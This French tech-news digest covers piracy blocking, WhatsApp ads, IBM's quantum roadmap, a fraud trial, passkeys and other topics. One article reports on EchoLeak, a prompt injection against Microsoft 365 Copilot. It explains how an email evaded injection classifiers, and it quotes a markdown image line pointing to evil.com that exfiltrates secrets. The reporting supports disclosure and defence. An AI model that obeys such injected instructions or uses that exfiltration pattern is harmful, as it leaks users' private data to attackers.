L’article 10 du texte met à jour la procédure judiciaire et administrative en vigueur depuis le 1ᵉʳ janvier 2022. Depuis cette date, les chaînes et ligues sportives qui constatent des atteintes à leurs droits audiovisuels sont en mesure de saisir la justice pour réclamer le blocage de sites pirates. Ils peuvent ensuite saisir l’Autorité de régulation de la communication audiovisuelle et numérique (Arcom) pour mettre à jour la liste noire des noms de domaines pirates.

À l’heure actuelle, rappelle L’Informé, ce blocage qualifié de « dynamique » concerne les fournisseurs d’accès français (Orange, Free, SFR, Bouygues Télécom, les trois fournisseurs de DNS (systèmes de noms de domaine) que sont Google, Cisco et Cloudflare, ainsi que plusieurs fournisseurs de VPN (réseaux privés virtuels), dont NordVPN ou Proton, depuis quelques semaines.

La proposition de loi adoptée au Sénat vise à accélérer la cadence. En l’état, le texte prévoit que les titulaires des droits de diffusion aient toujours à saisir le juge, puis soient autorisés à collecter les informations d’identification de sites pirates. En revanche, ils pourront transmettre ces données directement et automatiquement aux FAI et autres acteurs techniques pour les faire bloquer, sans passer par l’Arcom.

Les adresses IP dans le viseur

Surtout, les critères adoptés dans la proposition de loi ouvrent la voie à des blocages plus larges, via les adresses IP. D’après l’Informé, l’Association pour la Protection des Programmes Sportifs (APPS) aurait déjà trouvé un accord de blocage par IP avec les principaux FAI français – une procédure jamais mise en place en France à l’heure actuelle.

Si elle refuse de commenter ce sujet, l’APPS indique, comme la Ligue de football professionnel (LFP), vouloir se « mettre à niveau des Anglais, des Espagnols ou encore des Italiens ». La seconde souligne à l’Informé que l’Angleterre bloque « jusqu’à 10 000 adresses IP chaque week-end pour protéger la Premier League », alors que l’Arcom « a bloqué 3 797 noms de domaines en 2024 ».

Le risque, constaté en Espagne fin 2024 ou encore en Autriche en août 2022, est que ces pratiques entraînent la suspension d’autres services que les seuls sites pirates. Si le blocage décidé en justice vise un serveur mutualisé, ou que les informations transmises sont erronées, des sites légitimes pourraient en effet se retrouver hors ligne. Auprès de l’Informé, le délégué général de l’APPS assure que « tout sera mis en place » pour éviter les « risques de surblocage ».

Procédure accélérée

Le texte, qualifié d’ « urgent » par son rédacteur Laurent Lafon, face à la « crise de confiance » et « des conflits d’intérêts voire des dérives » dans le monde du football, doit désormais passer devant l’Assemblée Nationale. Le Monde précise que l’exécutif a activé la « procédure accélérée » de son examen.

Sur la question de la lutte contre le piratage, le bureau du sénateur Lafon envisage un système d’information déployé et contrôlé par l’Arcom – une piste encore en discussion.

  •  

☕️ Meta introduit de la publicité dans Whatsapp

En septembre 2023, Will Cathcart, président de WhatsApp niait l’existence de discussions dans son équipe autour de l’intégration des publicités dans WhatsApp. Comme le rappelle l’AFP, jusque-là, les seuls formats publicitaires qu’on pouvait voir dans l’application étaient des messages promotionnels envoyés via WhatsApp Business avec le consentement de l’utilisateur.

Moins de deux ans après la réaction de Will Cathcart, l’entreprise annonce officiellement cette intégration dans son application. Les publicités apparaitront dans l’onglet Actus de WhatsApp. Celui-ci regroupe les statuts et les chaines. L’entreprise, dont le billet s’adresse aux annonceurs, met en avant le fait que ses utilisateurs fréquentent en nombre cet onglet : « il est aujourd’hui utilisé par 1,5 milliard de personnes par jour dans le monde ».

Possibilité de promouvoir une Chaîne, publicités dans les statuts : Meta accélère sur la monétisation de WhatsApp

L’entreprise explique qu’elle va transformer l’onglet Actus pour y ajouter trois fonctionnalités :

  • L’inscription à des chaines : « Vous pourrez soutenir votre chaîne préférée, par exemple votre réseau d’information favori, en vous abonnant pour recevoir des mises à jour exclusives moyennant un montant mensuel » ;
  • La promotion de chaines : « Nous vous aiderons à découvrir de nouvelles chaînes susceptibles de vous intéresser lorsque vous consulterez l’annuaire. Pour la première fois, les administrateurs de chaînes disposent d’un moyen d’accroître la visibilité de leurs chaînes » ;
  • La publicité dans les statuts : « Vous pourrez trouver une nouvelle entreprise et entamer facilement une conversation avec elle au sujet d’un produit ou d’un service qu’elle promeut dans Statuts ».

Contrairement à sa communication concernant Instagram ou Facebook, Meta insiste sur le fait que l’insertion de la publicité dans WhatsApp serait ajoutée « de la manière la plus respectueuse possible de la vie privée ».

L’entreprise précise néanmoins que « pour afficher des publicités dans Statuts ou dans les chaînes qui pourraient vous intéresser, nous utiliserons des informations limitées telles que votre pays ou ville, votre langue, les chaînes que vous suivez et la façon dont vous interagissez avec les publicités que vous voyez. Pour les personnes qui ont choisi d’ajouter WhatsApp au Centre de comptes, nous utiliserons également vos préférences publicitaires et les informations de vos comptes Meta ».

Meta jure qu’elle n’utilisera pas les messages personnels, les appels et les groupes de ses utilisateurs pour déterminer les publicités qu’ils verront. « Nous ne vendrons ni ne partagerons jamais votre numéro de téléphone avec des annonceurs », promet encore l’entreprise.

Elle ne précise pas si cette insertion de publicité dans l’application concerne une zone géographique particulière.

  •  

☕️ [MàJ] Ces sociétés de la tech au portefeuille de Clara Chappaz

Mise à jour du 18 juin : ajout du décret selon lequel la ministre se déporte des dossiers liés à Vestiaire Collective.

Le gouvernement Bayrou a récemment publié les déclarations d’intérêt de ses 36 membres. Dans le lot, la ministre déléguée au numérique et à l’intelligence artificielle Clara Chappaz déclare posséder plus de 800 000 euros d’action dans 43 entreprises, soit 18 de plus que les 25 listées dans sa déclaration précédente.

Outre 74 877 euros de Vestiaire Collective, dont elle était directrice commerciale, la ministre détient des parts dans plusieurs entreprises du secteur de la tech, avec lesquelles elle est directement susceptible d’interagir dans le cadre de ses fonctions.

C’est le cas des deux européennes ST Microelectronics (8 128 euros) et ASML (14 334 euros). Plusieurs autres de ses participations concernent les états-uniennes : Alphabet (17 425 euros), Amazon (18 705 euros), Microsoft (23 573 euros), NVIDIA (23 751 euros), ou encore le fabricant de semi-conducteurs Kla Corporation (18 677 euros).

Comme ASML, ces cinq entreprises n’étaient pas citées dans la déclaration produite alors que Clara Chappaz était ministre déléguée du gouvernement Barnier.

Selon CheckNews, « ses actions sont administrées « sous mandat de gestion », donc sans intervention possible de sa part ».

Selon un décret paru le 17 juin au Journal officiel, la ministre se déportera des dossiers liés à Vestiaires Collective ainsi qu’au groupe Jump, dont son conjoint est directeur des opérations.

  •  

☕️ LibreOffice 25.8 abandonnera Windows 7 et 8, Windows 10 dans le collimateur

La prochaine version de la suite bureautique libre et gratuite sera la première à se débarrasser de Windows 7, 8 et 8.1. Les deux systèmes ne seront plus pris en charge, ce qui signifie que la mise à jour ne sera pas proposée sur ces systèmes. Il ne sera plus possible également d’installer la suite sur les machines concernées à partir de cette version.

La nouvelle version minimale devient ainsi Windows 10. Mais le système est dans le viseur de la Document Foundation, qui édite LibreOffice. La fondation se joint en effet à KDE dans son appel à abandonner Windows pour Linux.

Cette multiplication des communications n’est pas étonnante : l’arrêt du support de Windows 10, le 14 octobre prochain, obligera des centaines de millions de personnes à choisir entre racheter un appareil sous Windows 11 ou changer de crèmerie.

Linux est présenté comme la solution idéale, puisqu’il permet de garder le matériel existant. Un choix affiché comme vertueux, aussi bien financièrement qu’écologiquement. Comme nous le relevions cependant, il pose un sérieux problème : comment expliquer aux personnes concernées le problème, procéder au remplacement et leur apprendre de nouveaux usages ?

Au-delà de ces thématiques, la première bêta de LibreOffice 25.8 apporte son lot d’améliorations. Par exemple, l’outil Auto-Redact de Writer se dote d’une fonction de confidentialité permettant de supprimer toutes les images d’un document. Toujours dans Writer, une nouvelle règle de césure empêche les mots de se couper à la fin d’une page, décalant alors la ligne entière sur la page suivante, pour des questions de lisibilité.

Parmi les autres apports, signalons une infobulle indiquant le nombre de mots et de caractères pour les titres et sous-titres, une sélection de texte plus précise, l’ajout d’une commande pour convertir les champs en texte brut, de nouvelles fonctions pour Calc (TEXTSPLIT, VSTACK et WRAPROWS), une meilleure prise en charge des polices intégrées dans les documents PPTX, ou encore un support amélioré du mode plein écran dans macOS.

  •  

☕️ [MàJ] Panne de SFR : le cœur de réseau était touché, 100 Go offert aux clients

Mise à jour le 17 juin à 19h30 : Par le biais d’un communiqué de presse, SFR revient de nouveau sur l’incident de lundi et explique qu’il provient d’un « incident technique sur une plateforme de services du cœur de réseau ». Il a affecté le réseau mobile de l’opérateur, avec des « déconnexions aléatoires pour les abonnés ».

En guise de compensation, « les abonnés mobile SFR et RED by SFR se verront automatiquement offrir 100 Go d’Internet mobile ces prochains jours, sans qu’aucune démarche de leur part ne soit nécessaire ». Comme le rappelle Le Figaro, « depuis une réglementation entrée en vigueur en novembre 2024, les clients peuvent réclamer une compensation dès huit heures de panne. Elle s’élève à environ 1 euro pour 8 heures d’interruption, puis 1,50 euro par jour supplémentaire ».

Mise à jour le 17 juin à 8h02 : SFR vient d’annoncer ce matin que « l’ensemble des services mobiles qui ont pu être impactés par l’incident d’hier ont été rétablis à 100 % ». L’opérateur annonce que les communications sont progressivement revenues dans la soirée. Aucune explication par contre sur les causes de cet incident qui a donc duré plusieurs heures.

N’hésitez pas à nous signaler dans les commentaires si la situation est revenue à la normale ce matin, où s’il persiste encore des problèmes.


C’est un peu le scénario catastrophe pour SFR : de nombreux clients de l’opérateur indiquent ne plus avoir accès au réseau, aussi bien sur le fixe que sur le mobile. Sur Downdetector, les signalements sont nombreux, avec des conséquences pour des opérateurs virtuels passant par le réseau de SFR.

Dans les discussions sur FRnOG aussi, des retours font état de gros problèmes sur le réseau national de SFR. La panne aurait débuté un peu avant 11 h avant d’avoir des signes de retours au moins partiels à partir de 12 h, sans que le problème ne soit pour autant réglé.

« Depuis 10h50 ce matin, SFR subit un incident majeur dans tout son réseau de collecte convergeant vers le NetCenter de Bordeaux », explique Charles Enel-Rehel, fondateur de Saclak Network. « Nous avons pas mal de régions touchées », ajoute Arnauld Peyrou, le responsable infrastructure et sécurité chez Inrap. Même son de cloche chez d’autres.

Sur les réseaux sociaux, les signalements sont très nombreux. L’opérateur a fini par réagir officiellement à 14h08 avec un message des plus laconique : « Nous vous informons qu’un incident technique impacte actuellement notre réseau. Nos équipes techniques sont pleinement mobilisées pour rétablir la situation. Nous vous prions de bien vouloir nous excuser pour la gêne occasionnée ». Message qui tourne désormais en boucle en réponse aux demandes des clients.

On note tout de même la réponse du compte officiel à 11h49 qui renvoyait vers la page d’assistance « afin de voir si une panne est en cours sur votre secteur ainsi que sa date présumée de rétablissement ». Page qui affichait alors le message suivant : « Ce service est actuellement en maintenance, nous vous invitons à revenir ultérieurement ».

Nous avons désormais aussi la liste des sites en maintenance, mais avec une mise à jour à 8:36, avant la panne. Rien concernant la panne actuelle sur cette page dédiée aux maintenances.

  •  

☕️ La ministre de la Santé va interdire les écrans aux moins de trois ans

La ministre de la Santé et des Solidarités Catherine Vautrin compte « interdire l’exposition aux écrans pour les plus petits, de la naissance à l’âge de 3 ans », tout en admettant que les autorités ne seront « pas chez les gens pour le vérifier ».

Dans les prochaines semaines, elle prévoit de publier « un arrêté interdisant les écrans dans les lieux d’accueil des enfants de moins de 3 ans », rapporte Libération.

La ministre décrit ce projet comme une manière « d’insuffler l’idée que ça ne se fait pas ». Elle compare l’arrêté à « l’interdiction de la fessée » : quand bien même la police n’est pas allée vérifier le respect de la règle, cette dernière a « fini par ancrer l’idée qu’on ne tape pas un enfant, même d’une « petite fessée » ».

Flock

Entré en vigueur au 1ᵉʳ janvier, le dernier carnet de santé stipule qu’il ne faut « pas d’écran avant 3 ans », et en préconise un usage « occasionnel, limité à des contenus à qualité éducative et accompagné par un adulte » pour les 3 années suivantes.

Les propos de la ministre font suite à une alerte de cinq sociétés savantes alertant contre les dangers de l’exposition aux écrans avant six ans.

Un an plus tôt, plusieurs de ses signataires avaient remis à Emmanuel Macron un rapport et 29 recommandations sur l’usage des écrans. Ils y préconisaient notamment de ne pas y exposer les enfants de moins de 3 ans.

  •  

Le plan d’IBM pour des ordinateurs quantiques « à grande échelle et tolérants aux erreurs »

Il y a le bon qubit et le mauvais qubit
Le plan d’IBM pour des ordinateurs quantiques « à grande échelle et tolérants aux erreurs »

Lors du salon Vivatech de la semaine dernière, IBM a présenté son projet de construction d’un « premier ordinateur quantique à grande échelle et tolérant aux erreurs ». Maintenant que la solution technique est trouvée, la mise en œuvre peut commencer, avec des étapes intermédiaires jusqu’en 2029.

IBM a présenté sa nouvelle feuille de route pour arriver à son objectif de passer à 200 qubits en 2029 (puce Starling) puis à 2 000 qubits (puce Blue Jay) à partir de 2033… On pourrait presque penser que cela n’a rien de bien exceptionnel alors que la puce Heron d’IBM est déjà à 133 qubits et même 156 dans sa version R2.

Mais ce serait aller trop vite en besogne puisqu’on ne parle pas des mêmes qubits. Avec les puces actuelles, ce sont des qubits physiques : un qubit utile sur Heron par exemple, correspond à un qubit physique sur le processeur.

200 puis 2 000 qubits logiques

Avec Starling et Blue Jay, IBM parle de qubits logiques. Chaque qubit logique est constitué de plusieurs (dizaines, centaines, milliers…) de qubits physiques. Dans le cas de Starling et Blue Jay, IBM ne souhaite pas communiquer le nombre de qubits physiques sous-jacents dans les deux puces.

Multiplier les qubits physiques pour un seul qubit logiques permet de réduire les taux d’erreurs, un problème important de l’informatique quantique. Si un qubit logique est constitué de 100 qubits physiques et que 98 d’entre eux indiquent une même valeur, ce sera celle utilisée par le qubit logique.

On réduit ainsi mathématiquement le taux d’erreur, ils sont même « supprimés de manière exponentielle avec la taille du groupe [de qubits physiques], ce qui leur permet d’effectuer un plus grand nombre d’opérations », affirme IBM. Cette dernière est loin d’être la seule société à faire ainsi, c’est une approche on ne peut plus classique dans le monde des calculateurs quantiques.

De 100 millions à 1 milliard de portes quantiques

Fin 2024, IBM rappelait à juste titre qu’il n’y avait pas que le nombre de qubits à prendre en compte pour estimer la puissance des machines quantiques, il faut aussi connaitre le nombre de portes utilisables pendant les calculs.

Avec Starling et ses 200 qubits, IBM annonce 100 millions de portes en 2029. À partir de 2033, avec Blue Jay et ses 2 000 qubits, ce sera un milliard de portes. C’est un passage à l’échelle important puisque la puce Heron de 2024 (133 qubits physiques) est donnée pour 5 000 portes « seulement ».

Des portes, il en faut en quantité pour avoir des algorithmes réellement utilisables dans la pratique. Prenons l’exemple de l’algorithme de Shor permettant de « casser » la cryptographie asymétrique (type RSA). Il fait beaucoup parler de lui, mais nous sommes encore loin de pouvoir l’utiliser pour casser du chiffrement sur des milliers de bits.

Vivien Londe (spécialiste quantique chez Microsoft, ex-doctorant Inria) remettait l’église au centre du village il y a quatre ans déjà : il faudrait un « ordinateur quantique de 6 000 qubits parfaits [c‘est-à-dire une puce avec 6 000 qubits logiques, ndlr] et capable de faire de l’ordre de 10 milliards d’opérations » pour mettre « en danger tout un pan de la cryptographie actuelle ». On s’en approchera seulement à partir de 2033 selon la roadmap IBM.

La solution d’IBM, en deux temps

Réussir à multiplier les qubits physiques pour obtenir des qubits logiques les plus « fiables » possibles (en réduisant au maximum le taux d’erreur) est donc tout l’enjeu moderne des ordinateurs quantiques. IBM semble confiant d’arriver à un ordinateur « tolérant aux erreurs ». Si le taux ne sera a priori jamais de 100 %, il est question de 99,9999… avec « plein de 9 » derrière la virgule, nous confirme IBM.

Pour le géant américain, « la création d’un nombre croissant de qubits logiques capables d’exécuter des circuits quantiques, avec le moins de qubits physiques possible, est essentielle pour l’informatique quantique à grande échelle. Jusqu’à aujourd’hui, aucune voie claire vers la construction d’un tel système tolérant aux erreurs sans des frais d’ingénierie irréalistes n’a été publiée ».

IBM affirme justement avoir dépassé un cap sur cette problématique avec la publication d’un article sur des « codes de contrôle de parité à faible densité quantique (qLDPC : quantum low-density parity check) ». Ils permettent de réduire « considérablement le nombre de qubits physiques nécessaires à la correction d’erreurs et réduit les coûts additionnels requis d’environ 90 % par rapport aux autres codes à la pointe ».

Dans un second article, IBM explique « comment décoder efficacement les informations provenant des qubits physiques et trace une voie pour identifier et corriger les erreurs en temps réel avec des ressources informatiques conventionnelles ».

Quantum Loon, Kookaburra et Cockatoo

La nouvelle feuille de route d’IBM prévoit trois étapes intermédiaires avant d’arriver à Starling en 2029.

La première baptisée Quantum Loon est prévue pour 2025. Ce processeur « est conçu pour tester les composants de l’architecture pour le code qLDPC, notamment les « coupleurs de type C » qui connectent les qubits sur de plus longues distances au sein d’une même puce ».

L’année prochaine, ce sera au tour de Kookaburra. Il s’agira du « premier processeur modulaire d’IBM conçu pour stocker et traiter des informations codées ». Il combine une mémoire quantique avec des opérations logiques, « ce qui constitue la base de la mise à l’échelle de systèmes tolérants aux erreurs au-delà d’une seule puce ».

D’autres fabricants travaillent sur de la mémoire quantique, notamment pour connecter entre eux différentes machines quantiques, mais aussi pour transmettre de l’informatique en mode quantique. Nous y reviendrons dans un prochain article.

En 2027, le processeur Cockatoo sera un peu la concrétisation des travaux précédents. Il « intriquera deux modules Kookaburra à l’aide de « coupleurs de type L ». Cette architecture reliera les puces quantiques entre elles comme les nœuds d’un système plus vaste, évitant ainsi la nécessité de construire des puces de taille irréaliste ».

« Ensemble, ces avancées sont conçues pour aboutir à Starling en 2029 », affirme IBM en guise de conclusion.

  •  

☕️ 72 000 victimes d’arnaques et de prélèvement frauduleux : à Lyon, un procès hors norme

72 000 victimes de prélèvements frauduleux et d’arnaques, 2 400 parties civiles, deux amphithéâtres d’université et une web radio en continu pour les accueillir en plus de la salle d’audience…

Le procès qui s’ouvre aujourd’hui à Lyon, dans lequel 14 hommes font face à 22 chefs de mise en examen parmi lesquels celui d’ « escroquerie en bande organisée », est d’une dimension rare.

Il a pu s’ouvrir à la suite de l’arrestation d’un stagiaire puis alternant d’une agence Adecco de Besançon, explique La Charente Libre. Dix mois plus tard, les enquêteurs avaient réussi à débrouiller l’écheveau de discussions et de réseaux animés sur le darkweb pour orchestrer des escroqueries en tous genres : fausses demandes de MaPrime Rénov, de Chèques Vacances, de Pass Culture, d’assurance-vie…

L’affaire avait débuté en 2022, lorsque la filiale française de la société d’intérim Adecco subit un vol massif de données. En juin, le stagiaire qui sera finalement arrêté livre ses identifiants et mots de passes à « Abeloth », un pseudonyme utilisé en ligne.

Cinq mois plus tard, Adecco porte plainte, alors que plus de 32 000 intérimaires se sont vu prélever des sommes de 49,85 euros, juste sous le seuil d’autorisation préalable, et que 40 000 autres ont subi des tentatives de prélèvements bloquées à temps ou remboursées par les banques. 


Les données saisies ont aussi permis au fameux « Abeloth » et à son réseau de fabriquer de fausses cartes Vitale et des comptes bancaires dédiées au blanchiment des fonds volés.

Composé de cinq ou six hackers jamais condamnés, d’un « personnage central » qui s’est lancé dans ces activités à seulement 19 ans et auquel les enquêteurs reconnaissent des « capacités intellectuelles élevées », le réseau de prévenus est très jeune. Pour son « cerveau », les enquêteurs évoquent une « escalade addictive » dans la « recherche de failles » informatiques, au point d’avoir « continué ses activités » en prison, grâce à des smartphones.

Le reste des membres du réseau sont plutôt connus des forces de police pour des affaires d’escroqueries, violences ou trafic de stupéfiants.

  •  

☕️ 23andMe pourrait finalement revenir dans les mains de son ancienne CEO Anne Wojcicki

C’est un « twist » inattendu dans l’histoire de la chute de l’entreprise d’analyse génétique : TTAM Research Institute, une organisation à but non lucratif créé par Anne Wojcicki, a finalement fait une offre supérieure à celle de l’entreprise américaine de biotech Regeneron. Cette organisation a été bâtie dans ce seul but, l’acronyme reprenant les premières lettres de « Twenty three and me ».

Vendredi 13 juin, le Wall Street Journal expliquait que l’organisation de l’ancienne CEO de 23andMe avait fait une offre de 305 millions de dollars. Au début du mois, Regeneron annonçait avoir racheté l’entreprise aux enchères pour 256 millions de dollars, soulevant des interrogations sur la vente des données génétiques sans le consentement explicite des clients de 23andMe.

Brin. ADN

Anne Wojcicki avait démissionné de son poste de CEO pour pouvoir devenir candidate au rachat de manière indépendante mais l’annonce de Regeneron a fait croire qu’elle était définitivement poussée sur la touche. Regeneron a, selon le Wall Street Journal, refusé de faire une offre supérieure. La proposition de TTAM doit encore être approuvée par la justice étasunienne.

Dans un communiqué, 23andMe explique que TTAM s’aligne sur ses positions concernant la politique de gestion de données de ses clients (notamment les données génétiques). Elle s’engage à leur envoyer des emails pour leur expliquer comment supprimer leurs données, mais reste sur une politique d’ « opt-out » lui permettant de les utiliser sans avoir à redemander le consentement explicite des clients de 23andMe.

  •  

Une faille zéro-clic dans Copilot 365 souligne la fragilité des agents IA

Phishing assisté par IA
Une faille zéro-clic dans Copilot 365 souligne la fragilité des agents IA

Les chercheurs de la startup Aim Security ont exploité l’automatisation du traitement des emails par l’IA Copilot de Microsoft pour exfiltrer des données d’un utilisateur. Cette vulnérabilité, nommée EchoLeak, montre comment l’IA générative intégrée à des services en production peut facilement devenir une porte d’entrée pour des attaques discrètes.

La suite bureautique en ligne de Microsoft 365 permettait pendant un temps à une personne mal intentionnée d’exfiltrer les données de ses utilisateurs. C’est l’agent IA Copilot, intégré dans la suite par l’entreprise, qui en était responsable, selon les chercheurs de la startup en sécurité informatique Aim Security. Ils ont rendu publique leur découverte après avoir informé Microsoft, lui donnant le temps de colmater la faille.

La configuration des RAG de Copilot en cause

Dans son billet d’explication, Aim Security explique que cette vulnérabilité – que l’entreprise a nommée EchoLeak – « exploite les défauts de conception typiques des RAG de Copilot ». Les RAG (Retrieval-augmented generation), permettent de plonger une IA générative dans une masse de documents pour qu’elle s’y adapte. Cela permet d’augmenter la pertinence des réponses générées, notamment pour travailler sur des documents internes ou en faire des résumés. Les RAG de Copilot interrogent le Microsoft Graph, une API permettant d’accéder aux données utilisateurs. Ainsi, ils peuvent récupérer les données de la plupart des services proposés par Microsoft :

Mais, jusqu’à récemment, la configuration par défaut de Copilot permettait à des attaquants d’exfiltrer des données sans dépendre d’une action spécifique de l’utilisateur.

Les instructions dans un simple email

L’attaque imaginée par Aim Security se déroule en trois étapes : d’abord l’injection masquée d’instructions à Copilot lui demandant de récupérer des données, puis l’activation de ces instructions et enfin l’exfiltration.

Pour la première étape, les chercheurs de la startup ont envoyé un email au compte utilisateur qu’ils attaquaient. Mais, contrairement au phishing classique, pas besoin ici que l’utilisateur l’ouvre. Il suffit qu’il interroge Copilot sur certains sujets pour que l’IA utilise le contenu du mail comme source.

Un contournement facile des sécurités mises en place par Microsoft

Deuxième étape, l’activation des instructions. Les concepteurs d’agent IA comme Copilot mettent en place des garde-fous pour que, si l’IA tombe sur un texte comportant des instructions, en principe, elle ne les exécute pas. Ces garde-fous sont appelés des classifieurs XPIA (cross-prompt injection attacks, attaques par injection d’instructions croisées).

« Malheureusement », selon les chercheurs d’Aim Security, « il a été facile de contourner ce problème en formulant l’e-mail contenant les instructions malveillantes comme si les instructions étaient destinées au destinataire ». Ils précisent que le contenu de l’e-mail qu’ils ont envoyé n’utilise jamais des termes faisant allusion à l’IA ou à Copilot « afin de s’assurer que les classificateurs XPIA ne détectent pas l’e-mail comme étant malveillant ». Ils ajoutent que les jeux de données qui permettraient de détecter des injections d’instruction sont rares et qu’il existe de nombreux moyens de cacher ce type d’injections.

Si l’utilisateur déclenche le traitement de l’email en interrogeant lui-même Copilot, les chances de réussite sont maximisées. Deux méthodes pour y parvenir, selon Aim Security : soit envoyer un certain nombre d’emails couvrant chacun un sujet, soit envoyer un long email avec chaque sujet traité de façon succincte. Les chercheurs ont choisi la deuxième option, comme ceci :

Le plus difficile reste de sortir les données

Cet email permet donc de déclencher des instructions pour que Copilot aille à la pêche aux données visées. Mais il reste à les exfiltrer. Ils ont d’abord réussi à créer en Markdown un lien dans le chat de Copilot avec des paramètres cachés qui renvoient les informations les plus sensibles.

Mais cela demandait à l’utilisateur de cliquer. Ils ont donc pensé à passer les paramètres via l’intégration d’une image. « Le navigateur essaiera automatiquement de récupérer l’image, de sorte que l’utilisateur n’a pas besoin de cliquer sur quoi que ce soit, mais le navigateur « cliquera sur le lien » pour nous », expliquent-ils.

« Les images markdown sont formatées de la même manière que les liens markdown, mais elles sont précédées d’un point d’exclamation :

![Image alt text](https://www.evil.com/image.png?param=<secret>)

« Ce formatage d’image en markdown est également soumis à la même rédaction que les liens », ajoutent-ils.

Reste un problème : Microsoft ne permet pas d’insérer n’importe quel lien dans les images. Seuls des liens vers différents serveurs listés par l’entreprise sont permis. Après avoir fouillé différentes façons d’utiliser ces serveurs, les chercheurs de Aim Security ont trouvé un lien lié à Teams qui permettait d’exécuter une requête GET sans nécessité d’interaction avec l’utilisateur.

Enfin, ils ont réussi à affiner leur attaque de façon à ce que l’email envoyé pour mettre en place l’attaque ne soit jamais découvert : « Pour ce faire, il suffit de demander au « destinataire de l’email » de ne jamais faire référence à ce courriel pour des raisons de confidentialité ».

Cinq mois pour trouver une solution

Le fondateur d’Aim Security, Adir Gruss, a expliqué au média Fortune que son équipe a découvert la faille et contacté Microsoft en janvier dernier. « Ils nous ont dit que c’était une véritable révolution pour eux », explique-t-il. Mais Microsoft a mis cinq mois à boucher la faille, ce qui « est un délai (très) élevé pour ce type de problème », a-t-il commenté.

« Nous remercions Aim d’avoir identifié et signalé ce problème de manière responsable afin qu’il puisse être résolu avant que nos clients ne soient affectés », a déclaré de son côté Microsoft. L’entreprise a ajouté : « Nous avons déjà mis à jour nos produits pour atténuer ce problème, et aucune action de la part de nos clients n’est nécessaire. Nous mettons également en œuvre des mesures supplémentaires de défense en profondeur afin de renforcer notre position en matière de sécurité ».

  •  

Passkeys : les plateformes d’Apple vont prendre en charge l’import/export sécurisé

Approuvé par Juliette Nichols
Passkeys : les plateformes d’Apple vont prendre en charge l’import/export sécurisé

Les clés d’accès, ou passkeys, sont souvent présentées comme la solution idéale pour remplacer les mots de passe. Elles ont notamment pour avantage de ne pas pouvoir être volées. Elles ont cependant un gros inconvénient : la complexité pour les transférer d’un compte à un autre. Apple a confirmé que toutes les versions 26 de ses plateformes prendront en charge cette opération.

Les clés d’accès ont de nombreux avantages par rapport aux mots de passe traditionnels. Il n’y a pas d’information à retenir, elles sont uniques et reposent sur une architecture de clés publiques/privées. Ainsi, la première est publique et est stockée par le service sur lequel on souhaite s’identifier. L’autre est privée, n’appartient qu’à l’utilisateur et est stockée dans une zone sécurisée. Toute utilisation de la clé privée demande une authentification, biométrique par défaut.

Le gros avantage de cette infrastructure est que la clé privée ne sort jamais de son antre. Lorsque l’on veut se connecter, une autorisation d’accès est demandée. Après authentification, un jeton est émis, basé sur la clé privée. Ce jeton est alors mis en contact avec la clé publique. Si la négociation se passe bien, la connexion est autorisée. L’intégralité du mécanisme repose sur le protocole WebAuthn (Web Authentication de l’alliance FIDO, un consortium réunissant tous les principaux acteurs dans ce domaine, dont Apple, Google et Microsoft.

Le danger des silos

Comme nous l’avions indiqué en novembre 2024, les clés d’accès souffrent actuellement d’un défaut majeur. Si vous restez constamment connecté dans le même univers centré sur un fournisseur, ce n’est pas un problème. Mais si vous comptez changer, ou si vous avez un lot hétérogène d’appareils, comme c’est le cas chez beaucoup de personnes, la situation est un peu compliquée.

Les principaux éditeurs proposent tous depuis plusieurs années la compatibilité avec les clés d’accès. Ils tentent de motiver les internautes en proposant régulièrement de passer à ce mode de connexion. Cependant, pour des questions pratiques, ces clés sont synchronisées avec le compte maison. Comme nous l’avions montré, Google synchronise ainsi les clés via Chrome, qui a l’avantage d’être disponible partout. Le navigateur peut même être paramétré comme gestionnaire de mots de passes (et de clés d’accès) sur d’autres plateformes, y compris iOS.

Le problème se voit de loin : si l’on passe plusieurs années dans un environnement synchronisé par un certain compte, comment changer de crèmerie ? La question est valable autant pour les trois principaux éditeurs de systèmes d’exploitation que pour les gestionnaires tiers. Avec les mots de passe, il y a possibilité d’exportation, le plus souvent sous forme de fichier CSV ou JSON. Mais une solution équivalente pour les clés d’accès romprait leur promesse principale en sortant les clés privées de leur enclave et en les rendant vulnérables.

Cette limitation, inhérente à la première version du mécanisme, a engendré bon nombre de critiques. Certaines personnes ont ainsi estimé que les clés d’accès n’étaient qu’un moyen supplémentaire de verrouiller un peu plus les utilisateurs dans certains écosystèmes. Pourtant, rester maitre de ses clés et pouvoir les déplacer sont des conditions sine qua non de leur succès. L’alliance FIDO avait donc commencé à travailler sur une extension du standard, avec notamment un protocole et un format de données pour sécuriser les échanges.

Généralisation des échanges dans les versions 26 chez Apple

Avantage de l’alliance FIDO, elle réunit sous un même toit tous les principaux acteurs considérés comme fournisseurs d’authentification. On y trouve ainsi 1Password, BitWarden, Dashlane, Devolution ou encore Okta. Autant de noms que l’on retrouvait en mars dans le brouillon du Credential Exchange Format, la nouvelle structure de données pour les échanges de clés.

Apple, en marge de sa WWDC, a publié une vidéo pour faire le point sur les nouveautés des clés d’accès. L’entreprise rappelle que le mécanisme est en lui-même « un voyage », qui change progressivement les habitudes. « Les gens sont propriétaires de leurs informations d’identification et devraient avoir la possibilité de les gérer comme ils l’entendent. Cela permet aux gens de mieux contrôler leurs données et de choisir le gestionnaire d’informations d’identification qu’ils utilisent », explique l’entreprise.

Apple présente le nouveau mécanisme comme « fondamentalement différent et plus sûr que les méthodes traditionnelles d’exportation ». Celles-ci passent le plus souvent par l’enregistrement des informations dans un fichier non chiffré, puis son importation manuelle dans une autre application. Dans la nouvelle solution, le partage des clés est initié depuis l’application qui les gère habituellement (l’app Mots de passe, chez Apple). On sélectionne alors l’application de destination, qui aura exposé cette capacité. L’opération doit être validée par une authentification et le transfert se base sur le format de données défini par l’alliance FIDO.

« Le système fournit un mécanisme sécurisé pour déplacer les données entre les applications. Aucun fichier non sécurisé n’est créé sur le disque, ce qui élimine le risque de fuite de données d’identification à partir de fichiers exportés. Il s’agit d’un moyen moderne et sûr de transférer des informations d’identification », explique Apple dans sa vidéo.

Côté applications et sites web, aucune modification n’est nécessaire. Elles continueront à s’adresser au gestionnaire de mots de passe et clés d’accès déclaré par défaut. Du côté des développeurs qui veulent pouvoir intégrer ces capacités dans leurs gestionnaires, il faut regarder du côté de deux nouvelles classes créées pour les versions 26 des plateformes d’Apple, ASCredentialImportManager et ASCredentialExportManager.

Précisons enfin que ces annonces sont basées sur un standard en brouillon. L’extension de la norme devrait être finalisée dans les prochains mois. Au vu des participants, ces fonctions vont se retrouver prochainement dans l’ensemble des plateformes et gestionnaires.

  •  

